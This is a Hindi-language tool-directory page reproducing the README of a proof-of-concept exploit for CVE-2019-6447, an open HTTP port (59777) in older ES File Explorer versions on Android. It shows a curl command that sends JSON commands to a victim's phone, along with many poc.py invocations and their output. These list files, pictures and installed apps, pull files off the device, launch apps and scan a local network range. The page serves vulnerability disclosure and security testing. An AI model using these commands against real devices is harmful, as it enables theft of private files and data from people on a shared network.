Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ESFileExplorerOpenPortVuln — ES File Explorer ओपन पोर्ट भेद्यता - CVE-2019-6447 | Kitploit
उपकरण/GitHubGitHub/fs0c131y/esfileexploreropenportvuln
एंड्रॉइड सुरक्षाटोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करनामोबाइल सुरक्षा
GitHubfs0c131y/esfileexploreropenportvuln

ESFileExplorerOpenPortVuln

ES File Explorer ओपन पोर्ट भेद्यता - CVE-2019-6447

रिपॉजिटरी देखें
67812927 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

ES File Explorer ओपन पोर्ट भेद्यता - CVE-2019-6447

उनके Google Play विवरण के अनुसार:

ES File Explorer (फ़ाइल प्रबंधक) स्थानीय और नेटवर्क दोनों उपयोगों के लिए एक पूर्ण-सुविधा युक्त फ़ाइल (चित्र, संगीत, मूवी, दस्तावेज़, ऐप) प्रबंधक है! दुनिया भर में 500 मिलियन से अधिक उपयोगकर्ताओं के साथ, ES File Explorer (फ़ाइल प्रबंधक) आपके एंड्रॉइड फोन और फ़ाइलों को कुशलतापूर्वक और प्रभावी ढंग से प्रबंधित करने और बिना डेटा खर्च किए फ़ाइलें साझा करने में मदद करता है।

जब भी कोई उपयोगकर्ता ऐप लॉन्च करता है, एक HTTP सर्वर शुरू होता है। यह सर्वर स्थानीय रूप से पोर्ट 59777 खोलता है:

root@kitploit:~
angler:/ # netstat -ap | grep com.estrongs
tcp6       0      0 :::59777                :::*                    LISTEN      5696/com.estrongs.android.pop

इस पोर्ट पर, एक हमलावर लक्ष्य पर एक JSON पेलोड भेज सकता है

root@kitploit:~
curl --header "Content-Type: application/json" --request POST --data '{"command":"[my_awesome_cmd]"}' http://192.168.0.8:59777

ये कमांड एक हमलावर को, जो पीड़ित के समान स्थानीय नेटवर्क से जुड़ा है, पीड़ित के फोन के बारे में बहुत सारी रोचक जानकारी (डिवाइस जानकारी, स्थापित ऐप्स, ...) प्राप्त करने, पीड़ित के फोन से दूरस्थ रूप से एक फ़ाइल प्राप्त करने और पीड़ित के फोन पर दूरस्थ रूप से एक ऐप लॉन्च करने की अनुमति देते हैं।

प्रभावित संस्करण

4.1.9.7.4 और इससे नीचे

POC विशेषताएँ

निम्नलिखित प्रूफ ऑफ कॉन्सेप्ट (POC) के साथ, आप यह कर सकते हैं:

  • सभी फाइलों को सूचीबद्ध करें (sdcard में पीड़ित डिवाइस पर)
  • सभी चित्रों को सूचीबद्ध करें (पीड़ित डिवाइस में)
  • सभी वीडियो को सूचीबद्ध करें (पीड़ित डिवाइस में)
  • सभी ऑडियो फाइलों को सूचीबद्ध करें (पीड़ित डिवाइस में)
  • सभी स्थापित ऐप्स को सूचीबद्ध करें (पीड़ित डिवाइस में)
  • सभी सिस्टम ऐप्स को सूचीबद्ध करें (पीड़ित डिवाइस में)
  • सभी फोन ऐप्स को सूचीबद्ध करें (पीड़ित डिवाइस में)
  • सभी apk फाइलों को सूचीबद्ध करें (sdcard में पीड़ित डिवाइस के)
  • सभी स्थापित ऐप्स को सूचीबद्ध करें (पीड़ित डिवाइस में)
  • डिवाइस जानकारी प्राप्त करें (पीड़ित डिवाइस की)
  • पीड़ित डिवाइस से एक फ़ाइल खींचें (Pull)
  • अपनी पसंद का कोई ऐप लॉन्च करें
  • अपनी पसंद के किसी ऐप का आइकन प्राप्त करें

डेमो

Demo

कैसे करें

root@kitploit:~
$ python poc.py -g /sdcard/Android/media/com.google.android.talk/Ringtones/hangouts_incoming_call.ogg

$ python poc.py --cmd appPull --pkg com.tencent.mm

$ python poc.py --cmd getAppThumbnail --pkg com.tencent.mm

$ python poc.py --cmd appLaunch --pkg com.tencent.mm
{"result":"0"}

$ python poc.py --cmd getDeviceInfo
{"name":"Nexus 6P", "ftpRoot":"/sdcard", "ftpPort":"3721"}

$ python poc.py --cmd listAppsAll
{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"},
{"packageName":"com.android.cts.priv.ctsshim", "label":"com.android.cts.priv.ctsshim", "version":"8.1.0-4396705", "versionCode":"27", "location":"/system/priv-app/CtsShimPrivPrebuilt/CtsShimPrivPrebuilt.apk", "size":"22744", "status":"null", "mTime":"1230796800000"}

$ python poc.py --cmd listAppsPhone
{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"}

$ python poc.py --cmd listAppsSystem
{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"}

$ python poc.py --cmd listApps
{"packageName":"com.google.android.youtube", "label":"YouTube", "version":"13.50.52", "versionCode":"1350523400", "location":"/data/app/com.google.android.youtube-hg9X1FaylPbUXO1SaiFtkg==/base.apk", "size":"36860368", "status":"com.google.android.apps.youtube.app.application.backup.YouTubeBackupAgent", "mTime":"1545337705957"}

$ python poc.py --cmd listAppsSdcard

$ python poc.py --cmd listAudios
{"name":"hangouts_incoming_call.ogg", "time":"10/17/18 11:33:16 PM", "location":"/storage/emulated/0/Android/media/com.google.android.talk/Ringtones/hangouts_incoming_call.ogg", "duration":5000, "size":"74.63 KB (76,425 Bytes)", }

$ python poc.py --cmd listPics
{"name":"mmexport1546422097497.jpg", "time":"1/2/19 10:41:37 AM", "location":"/storage/emulated/0/tencent/MicroMsg/WeChat/mmexport1546422097497.jpg", "size":"38.80 KB (39,734 Bytes)", }

$ python poc.py --cmd listVideos

$ python poc.py --cmd listFiles

$ python poc.py --cmd listFiles --network 192.168.1.

$ python poc.py --cmd listFiles --ip 192.168.4.17

$ python poc.py list

######################
# Available Commands #
######################

listFiles: List all the files
listPics: List all the pictures
listVideos: List all the videos
listAudios: List all the audio files
listApps: List all the apps installed
listAppsSystem: List all the system apps
listAppsPhone: List all the phone apps
listAppsSdcard: List all the apk files in the sdcard
listAppsAll: List all the apps installed (system apps included)
getDeviceInfo: Get device info
appPull: Pull an app from the device. Package name parameter is needed
appLaunch: Launch an app. Package name parameter is needed
getAppThumbnail: Get the icon of an app. Package name parameter is needed

संपर्क

मुझे Twitter पर फॉलो करें! आप मेरे काम का एक छोटा सा हिस्सा https://fs0c131y.com पर भी पा सकते हैं

क्रेडिट

@moonbocal से एक सुझाव के बाद, जांच और POC को ❤️ के साथ @fs0c131y द्वारा बनाया गया है

टूल डाउनलोड करें